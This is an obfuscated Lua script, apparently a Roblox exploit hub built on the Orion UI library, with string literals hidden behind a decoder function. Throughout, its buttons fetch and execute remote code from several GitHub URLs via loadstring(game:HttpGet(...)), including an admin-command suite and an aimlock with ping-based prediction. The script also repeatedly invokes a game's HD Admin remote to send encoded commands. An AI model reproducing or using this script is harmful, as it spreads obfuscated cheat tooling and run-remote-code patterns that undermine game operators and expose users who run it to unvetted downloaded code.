(v47==0) then v28:AddButton({[v7("\61\49\222\165","\115\80\179\192")]=v7("\127\136\157\148\186\164\117\148\142\130\200\164\28\148\136\159\204\165\110","\60\199\205\205\154\224"),[v7("\125\193\194\22\132\204\93\203","\62\160\174\122\230\173")]=function()setclipboard("https://discord.gg/eVPfzR33");end});v28:AddButton({[v7("\206\212\42\123","\128\181\71\30\78\106")]=v7("\228\121\9\219\69\54\247\250\243\99\27\199\69\35\241\225\236","\167\54\89\130\101\111\184\175"),[v7("\192\204\17\15\70\226\206\22","\131\173\125\99\36")]=function()setclipboard("https://youtube.com/@BEKO_HUB");end});v47=1;end end end if (v35==(348 -(301 + 47))) then v28=v18:MakeTab({[v7("\32\234\3\14","\110\139\110\107\118\92")]=v7("\142\0\253\109\24\153\1","\205\82\184\41\81"),[v7("\8\22\173\86","\65\117\194\56\48\61\184")]="rbxassetid://4483345998",[v7("\32\200\182\206\25\207\190\236\30\214\170","\112\186\211\163")]=false});v28:AddParagraph(v7("\62\58\52\28\230\157\14\104\37\23","\125\72\81\120\143\233"),v7("\149\34\37\172\237\30\231\98\106","\222\80\92\223\206\40"));v35=1;end end end if (v16==((0 -0) + 0)) then v17=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();v18=v17:MakeWindow({[v7("\52\250\13\234","\122\155\96\143\51")]=v7("\124\52\154\23\244\198\249\125\30\13\241\106\130","\62\113\209\88\212\142\172\63"),[v7("\213\70\235\135\236\89\248\66\230\151\209","\157\47\143\226\188\43")]=false,[v7("\168\163\22\169\142\153\7\163\149","\225\205\98\219")]=v7("\235\15\212\168\137\2\202\165\137\54\191\213\255","\169\74\159\231"),[v7("\204\199\19\255\99\79\241\192\12\253","\159\166\101\154\32\32")]=true,[v7("\5\243\229\89\81\33\218\228\83\92\35\238","\70\156\139\63\56")]=v7("\19\54\136\90\239\204\157\19\83\191\53\253\210","\81\115\195\21\207\132\200")});v19=v18:MakeTab({[v7("\3\81\45\76","\77\48\64\41\71\43\126")]=v7("\81\63\143\81","\25\112\194\20\34\204\106\109"),[v7("\8\199\114\40","\65\164\29\70")]="rbxassetid://4483345998",[v7("\154\3\83\20\132\195\126\55\164\29\79","\202\113\54\121\237\182\19\120")]=false});v20=v19:AddSection({[v7("\19\7\181\88","\93\102\216\61\55")]=v7("\131\193\23\208","\203\142\90\149\99\188\112")});v16=1 + 0;end if (v16==9) then v28:AddButton({[v7("\52\224\75\216","\122\129\38\189\174\176")]=v7("\157\232\99\133\254\245\124\158\146\232\107\252\144\230\126\153","\222\167\51\220"),[v7("\8\76\227\93\202\139\237\32","\75\45\143\49\168\234\142")]=function()setclipboard(v7("\132\43\176\140\140\241\254\130","\230\78\219\227\211\156\145"));end});v22:AddButton({[v7("\196\71\133\205","\138\38\232\168\155")]=v7("\0\37\197\153\52\137\17\43\212\234","\80\96\145\185\103\199"),[v7("\238\125\46\203\16\194\206\119","\173\28\66\167\114\163")]=function()local v40=488 -(58 + 430);local v41;local v42;while true do if (1==v40) then while true do if (v41==((457 + 177) -((489 -250) + 389))) then wait((5 -3) -(1387 -(535 + 851)));v42={[1]=v7("\230\71\140\27\2\176\74\205\89\16\239\28\217\91\16\232","\221\47\237\111\34")};game:GetService(v7("\114\2\78\187\251\67\6\74\178\246\115\19\81\165\243\71\2","\32\103\62\215\146")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(1);v42={[1 + 0]=v7("\169\113\161\153\139\58\62\125\167\45\241\220\156\103\105\105\165\45","\146\25\192\237\171\87\91\93")};v41=7 + 0;end if (v41==(1 + 4)) then local v74=0;while true do if (2==v74) then game:GetService(v7("\96\183\94\179\199\117\162\70\183\74\140\218\121\177\83\181\75","\50\210\46\223\174\22\195")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v41=3 + 3;break;end if (v74==(1219 -(343 + 875))) then wait(1);v42={[1]=v7("\208\3\44\185\203\6\40\237\221\88\123\244\219\91\125\245","\235\107\77\205")};v74=2;end if (v74==0) then local v138=0;while true do if (v138==0) then v42={[1]=v7("\130\128\172\58\26\212\141\237\125\3\141\216\254\121\15\138\221\252","\185\232\205\78\58")};game:GetService(v7("\234\49\190\12\228\164\217\32\171\4\222\179\215\38\175\7\232","\184\84\206\96\141\199")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v138=1;end if (v138==1) then v74=(1472 -448) -((2043 -(904 + 211)) + (177 -(32 + 50)));break;end end end end end if (v41==3) then local v75=0 -0;while true do if (v75==(1783 -(764 + 1019))) then wait(1);v42={[(194 -(44 + 149)) + 0]=v7("\150\171\68\167\165\218\38\23\153\246\20\225\183\135\123\3\148","\173\195\37\211\133\183\67\55")};v75=1;end if (v75==((4 -3) + 0 + 0)) then game:GetService(v7("\78\48\186\78\53\223\95\23\121\49\153\86\51\206\95\4\121","\28\85\202\34\92\188\62\99")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(1 + (0 -0));v75=2;end if (v75==((4 + 4) -(424 -(80 + 338)))) then v42={[(223 -(113 + 35)) -(64 + (25 -15))]=v7("\242\5\85\173\233\0\81\249\250\90\2\236\251\90\5\232\252","\201\109\52\217")};v41=4;break;end end end if (v41==(27 -19)) then loadstring(game:HttpGet("https://raw.githubusercontent.com/rouxhaver/scripts/main/FE pet Snakes.Lua",true))();break;end if (v41==(6 + 1 + 0)) then local v76=0;while true do if (v76==(0 -0)) then game:GetService(v7("\210\140\83\184\250\227\136\87\177\247\211\157\76\166\242\231\140","\128\233\35\212\147")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(1 + 0 + 0);v76=998 -(844 + 153);end if (v76==(1177 -(1016 + (684 -525)))) then wait(2 + 7);v41=1 + 7;break;end if (1==v76) then v42={[1 + 0]=v7("\133\180\184\5\158\177\188\81\136\233\234\66\138\233\234\72\140\236","\190\220\217\113")};game:GetService(v7("\120\81\247\4\128\64\186\94\81\227\59\157\76\169\75\83\226","\42\52\135\104\233\35\219")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v76=2;end end end if (v41==(0 -(0 + 0))) then local v77=0 + 0;while true do if (v77==(1 + 0)) then local v139=0;while true do if (v139==0) then game:GetService(v7("\48\234\4\18\11\236\21\10\7\235\39\10\13\253\21\25\7","\98\143\116\126")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(1683.2 -(1535 + 148));v139=1;end if (1==v139) then v77=1 + 1;break;end end end if (v77==0) then wait(0.2 + 0);v42={[1]=v7("\106\244\207\173\33\241\128\178\52\185\196","\81\153\160\223")};v77=2 -1;end if (v77==(1 + 1)) then v42={[1]=v7("\191\59\121\63\68","\132\88\17\94\54\89\128\103")};v41=1;break;end end end if (v41==((1480 -(1449 + 26)) -3)) then local v78=0;local v79;while true do if (v78==0) then v79=979 -(887 + 92);while true do if (v79==((2480 -(754 + 23)) -(439 + 1264))) then v42={[1]=v7("\103\195\219\103\124\198\223\51\104\147\142\36\104\152\139\32","\92\171\186\19")};game:GetService(v7("\2\165\78\57\4\247\162\36\165\90\6\25\251\177\49\167\91","\80\192\62\85\109\148\195")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v79=1;end if (v79==2) then game:GetService(v7("\7\219\222\185\198\54\223\218\176\203\6\202\193\167\206\50\219","\85\190\174\213\175")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v41=512 -(25 + 484);break;end if (v79==(1 + 0)) then wait(563 -(240 + 322));v42={[1 -0]=v7("\165\29\176\22\85\118\36\190\67\227\85\71\47\121\171\71","\158\117\209\98\117\27\65")};v79=5 -(378 -(228 + 147));end end break;end end end if (v41==(15 -11)) then local v80=0;while true do if (v80==0) then game:GetService(v7("\145\186\45\48\170\188\60\40\166\187\14\40\172\173\60\59\166","\195\223\93\92")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(3 -2);v80=1;end if (v80==1) then v42={[1 + 0]=v7("\137\237\90\251\89\93\215\165\8\187\73\9\132\180\9\185\79\0","\178\133\59\143\121\48")};game:GetService(v7("\146\225\109\193\169\231\124\217\165\224\78\217\175\246\124\202\165","\192\132\29\173")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));v80=2;end if (v80==2) then wait(2 -1);v41=5;break;end end end if (v41==1) then game:GetService(v7("\224\226\208\236\89\132\211\243\197\228\99\147\221\245\193\231\85","\178\135\160\128\48\231")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(0.3);v42={[2 -1]=v7("\214\24\238\152\157\29\161\135\136\85\239\133\130\23\176","\237\117\129\234")};game:GetService(v7("\38\253\253\94\198\1\85\0\253\233\97\219\13\70\21\255\232","\116\152\141\50\175\98\52")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v42));wait(1399 -(1119 + 279));v41=2 + 0;end end break;end if (v40==0) then local v65=0;while true do if (v65==1) then v40=1 + 0;break;end if (v65==0) then v41=0 -0;v42=nil;v65=1;end end end end end});v17:Init();break;end if (v16==(22 -16)) then v26=v18:MakeTab({[v7("\18\119\194\75","\92\22\175\46\148\135\52")]=v7("\84\113\7\11\95\127\99","\16\48\39\67"),[v7("\50\195\225\29","\123\160\142\115\139\95\129")]="rbxassetid://4483345998",[v7("\219\43\165\135\226\44\173\165\229\53\185","\139\89\192\234")]=false});v20=v26:AddSection({[v7("\99\191\190\190","\45\222\211\219\112\70\20\37")]=v7("\103\49\132\3\108\63\224","\35\112\164\75")});v26:AddButton({[v7("\117\238\255\214","\59\143\146\179\122\193")]=v7("\112\47\125\104\106\65\106\104\116\50\98\109\124\47\127","\57\97\43\33"),[v7("\145\23\71\195\74\179\21\64","\210\118\43\175\40")]=function()local v43=0;local v44;local v45;local v46;while true do if (v43==(1 + 0)) then v46=nil;while true do if (v44==(0 + 0 + 0)) then local v81=0 + 0;while true do if (v81==(241 -(122 + 118))) then v46({[v7("\247\121\247\255\179\218\108\240\245\174\221","\179\28\132\156\193")]=v7("\219\206\177\239\106\161\236\29\215\128\166\239\116\170\225\5","\178\160\199\134\25\200\142\113"),[v7("\28\160\33\177\45","\72\201\85\221")]=v7("\51\136\205\11\56\71\39\201\237\43\89\97\13\160\237\43\59\20\104\222\156","\94\233\169\110\24\37"),[v7("\96\172\44\8\226\235\242\74","\36\217\94\105\150\130\157")]=10});v44=1 + 0;break;end if (v81==(0 + 0)) then v45=loadstring(game:HttpGet("https://raw.githubusercontent.com/Kinlei/Dynissimo/main/Scripts/AkaliNotif.lua"))();v46=v45.Notify;v81=1 -0;end end end if (v44==(7 -4)) then getgenv().AutoPrediction=true;getgenv().Prediction=1127.157 -(9 + 61 + 1057);if (getgenv().AutoPrediction==true) then local v89=1973 -(1212 + 761);while true do if (v89==(0 + 0)) then h=function()while true do local v177=457 -((587 -439) + 309);local v178;local v179;local v180;while true do if (2==v177) then if ((v180>200) and (v180<(218 + 82))) then getgenv().Predictio=0.18742 -(0 + 0);elseif ((v180>(46 + 61 + 73)) and (v180<(561 -(47 + 319)))) then getgenv().Predictio=0.16779123 -(0 -0);elseif ((v180>(429 -(67 + (944 -(385 + 337))))) and (v180<180)) then getgenv().Predictio=0.16;elseif ((v180>(227 -(13 + 104))) and (v180<140)) then getgenv().Predictio=0.15934 -0;elseif (v180<(201 -96)) then getgenv().Predictio=(0.138 -0) + 0;elseif (v180<(444 -((441 -347) + 260))) then getgenv().Predictio=(60.136 -(28 + 32)) -0;elseif (v180<(23 + 57)) then getgenv().Predictio=(899.134 -(675 + 224)) -(0 + 0);elseif (v180<((1557 -(952 + 567)) + 32)) then getgenv().Predictio=684.131 -(492 + 192);elseif (v180<(116 -56)) then getgenv().Predictio=0.1229;elseif (v180<(22 + 28)) then getgenv().Predictio=0.1225;elseif (v180<(36 + 4)) then getgenv().Predictio=0.1256;end getgenv().Prediction=getgenv().Predictio;break;end if (v177==1) then local v196=(1756 -(1206 + 550)) -(360 -(149 + 211));while true do if (v196==(0 -0)) then v179=string.split(v178,"(");v180=tonumber(v179[4 -(6 -3)]);v196=1;end if (v196==(4 -3)) then v177=1851 -(1202 + 647);break;end end end if (v177==(0 -0)) then local v197=(4019 -2811) -(478 + 316 + (859 -445));while true do if (v197==0) then wait();v178=game:GetService(v7("\197\181\244\221\69","\150\193\149\169\54\59")).Network.ServerStatsItem[v7("\25\252\163\43\57\13\244\185\45","\93\157\215\74\25")]:GetValueString();v197=1;end if ((1395 -(171 + 1223))==v197) then v177=1 + 0;break;end end end end end end;spawn(h);break;end end end break;end if (v44==2) then Aiming.FOVSides=565 -315;Aiming.HitChance=100;Aiming.ShowFOV=flace;v44=2 + 1;end if ((1776 -(1453 + 322))==v44) then local v87=0;local v88;while true do if (v87==0) then v88=0 + 0;while true do if (v88==(1 + 0)) then Aiming.FOV=(32 + 412) -254;v44=2;break;end if (v88==(0 -0)) then loadstring(game:HttpGet("https://raw.githubusercontent.com/RFS-cmd/-/main/first"))();Aiming.TargetPart={v7("\122\243\45\131","\50\150\76\231\148")};v88=1;end end break;end end end end break;end if (v43==((430 + 1064) -((3338 -(1418 + 573)) + (522 -375)))) then local v66=0;while true do if (v66==0) then v44=0;v45=nil;v66=1;end if (v66==1) then v43=1;break;end end end end end});v27=v18:MakeTab({[v7("\5\217\12\32","\75\184\97\69")]=v7("\241\202\48\153\141\250\207\48\156\141\241\206\84\149","\181\139\16\209\194"),[v7("\60\122\182\55","\117\25\217\89\109")]="rbxassetid://4483345998",[v7("\104\59\208\201\194\77\36\250\202\199\65","\56\73\181\164\171")]=false});v16=7;end if (v16==7) then local v36=1416 -(884 + 532);while true do if (v36==((1109 + 474) -(1200 + (1199 -818)))) then v16=4 + 3 + 1;break;end if (v36==(2 -1)) then v26:AddButton({[v7("\88\19\42\93","\22\114\71\56\112\201\175")]=v7("\198\39\220\28\254\137\133\199\54","\136\114\151\89\172\169\200"),[v7("\206\172\182\83\16\236\174\177","\141\205\218\63\114")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Allvideo/test/main/Whitelist.txt"))();end});v25:AddParagraph(v7("\211\162\55\183\70\172\119\194\195\162\53\188","\176\205\90\210\47\194\16\226"),v7("\136\12\58\74\50\146\12\58\67\40\140\29\115\78\32\193\11\117\79\41\192","\225\120\26\32\71"));v36=1 + 1;end if (v36==0) then local v48=0;while true do if (v48==1) then v36=(1752 -(1213 + 538)) -(1373 -(358 + 1015));break;end if (v48==0) then v20=v27:AddSection({[v7("\16\22\63\77","\94\119\82\40\211\25")]=v7("\115\202\180\92\120\196\208\52\122\196\208\81\115\207","\55\139\148\20")});v27:AddButton({[v7("\81\136\37\209","\31\233\72\180\216\161\210\199")]=v7("\239\255\144\183\129\227\0\229\150\153\214\237\228\12\225\242\253\218\130\232\6\234\242","\174\182\221\151\205\172\67"),[v7("\100\192\204\247\69\192\195\240","\39\161\160\155")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/FDHKZY/Hood-Moddedaimlock/main/GU%C4%B0",true))();end});v48=1;end end end end end if (5==v16) then local v37=0 -(640 -(222 + 418));while true do if ((2 + 0)==v37) then v16=10 -4;break;end if (v37==(0 + 0)) then v23:AddButton({[v7("\195\55\121\70","\141\86\20\35")]=v7("\80\41\103\233\80\51\103\235\95","\17\103\46\164"),[v7("\37\224\218\197\14\179\43\91","\102\129\182\169\108\210\72\48")]=function()local v67=0;local v68;local v69;while true do if (0==v67) then v68=0 -0;v69=nil;v67=1;end if (v67==1) then while true do if (v68==(0 -0)) then v69=0;while true do if (v69==0) then local v176=0;while true do if (v176==0) then Animation=function(v191)local v198=0;local v199;while true do if (v198==(0 -0)) then v199=0;while true do if ((1 + 1)==v199) then game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=false;break;end if (v199==1) then for v205,v206 in ipairs(game.Players:GetChildren()) do local v207=0 + (0 -0);local v208;local v209;while true do if (v207==(0 + (1100 -(172 + 928)))) then v208=1419 -(1345 + 74);v209=nil;v207=1 + 0;end if (v207==1) then while true do if (v208==(2 + 0 + 1)) then v209.swimidle.SwimIdle.AnimationId="http://www.roblox.com/asset/?id=616166655";game.Players.LocalPlayer.Character.Humanoid.Jump=false;break;end if (v208==1) then local v216=1234 -(428 + 806);while true do if (v216==(89 -(4 + 11 + 74))) then v209.walk.WalkAnim.AnimationId="http://www.roblox.com/asset/?id=616168032";v209.run.RunAnim.AnimationId="http://www.roblox.com/asset/?id=616163682";v216=1 + 0;end if (v216==(118 -(11 + 106))) then v209.jump.JumpAnim.AnimationId="http://www.roblox.com/asset/?id=1083218792";v208=2 + 0;break;end end end if (v208==0) then v209=game.Players.LocalPlayer.Character.Animate;v209.idle.Animation1.AnimationId="http://www.roblox.com/asset/?id=782841498";v209.idle.Animation2.AnimationId="http://www.roblox.com/asset/?id=782841498";v208=1 -0;end if (v208==2) then local v220=0;while true do if (v220==0) then v209.climb.ClimbAnim.AnimationId="http://www.roblox.com/asset/?id=1083439238";v209.fall.FallAnim.AnimationId="http://www.roblox.com/asset/?id=707829716";v220=1;end if (v220==1) then v209.swim.Swim.AnimationId="http://www.roblox.com/asset/?id=616165109";v208=3;break;end end end end break;end end end wait(265 -(40 + 224));v199=2;end if (v199==0) then local v204=0 -(0 + 0);while true do if (v204==0) then v191:WaitForChild(v7("\49\176\196\23\1\190\24","\112\222\173\122\96\202\125"));game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored=true;v204=1;end if (v204==(1 + 0 + 0)) then v199=1 + 0;break;end end end end break;end end end;Animation(game.Players.LocalPlayer.Character);v176=1 + 0;end if (v176==1) then v69=722 -((2443 -(231 + 1631)) + 140);break;end end end if (((1 -0) -0)==v69) then game.Players.LocalPlayer.CharacterAdded:Connect(Animation);break;end end break;end end break;end end end});v25=v18:MakeTab({[v7("\0\57\165\192","\78\88\200\165\102\187")]=v7("\192\38\79","\147\99\23\46\153\69\114"),[v7("\142\56\192\134","\199\91\175\232\231\159\187")]="rbxassetid://4483345998",[v7("\60\160\119\45\131\24\1\157\124\44\147","\108\210\18\64\234\109")]=false});v37=1;end if (v37==1) then v20=v25:AddSection({[v7("\91\115\213\10","\21\18\184\111\81\191\146\90")]=v7("\158\223\227","\205\154\187\37\160")});v19:AddButton({[v7("\163\91\7\163","\237\58\106\198\114\201\227\230")]=v7("\47\203\223\174\205\202\247\32","\100\142\134\236\130\139\165"),[v7("\56\201\53\60\231\210\21\220","\123\168\89\80\133\179\118\183")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt",true))();end});v37=2;end end end if (v16==(2 + 0)) then local v38=0;local v39;while true do if (0==v38) then v39=521 -((1733 -1269) + (180 -123));while true do if ((0 + (0 -0))==v39) then v21:AddButton({[v7("\102\39\220\16","\40\70\177\117\32\158\114")]=v7("\248\229\245\85\168\153\232\238","\185\161\184\28\230"),[v7("\198\243\248\71\213\236\35\238","\133\146\148\43\183\141\64")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end});v21:AddButton({[v7("\2\82\73\33","\76\51\36\68\161\225")]=v7("\127\255\55\246\35\30\242\52\249\36\112\242\46\250\52\119\254\54\251","\62\187\122\191\109"),[v7("\105\54\182\173\11\75\52\177","\42\87\218\193\105")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();end});v39=773 -(242 + 530);end if (v39==(2 + 0 + 0 + 0)) then v16=5 -2;break;end if (v39==(1 + 0)) then local v70=0;while true do if (0==v70) then v22=v18:MakeTab({[v7("\124\190\120\121","\50\223\21\28")]=v7("\33\53\108\33\152\38\37\30\46\141","\114\118\62\104\200"),[v7("\127\186\232\203","\54\217\135\165\49")]="rbxassetid://4483345998",[v7("\223\154\134\220\40\250\133\172\223\45\246","\143\232\227\177\65")]=false});v20=v22:AddSection({[v7("\7\117\117\65","\73\20\24\36\29")]=v7("\106\229\231\141\232\145\71\25\224\240","\57\166\181\196\184\197\20")});v70=1;end if (v70==1) then v39=8 -6;break;end end end end break;end end end end break;end end end
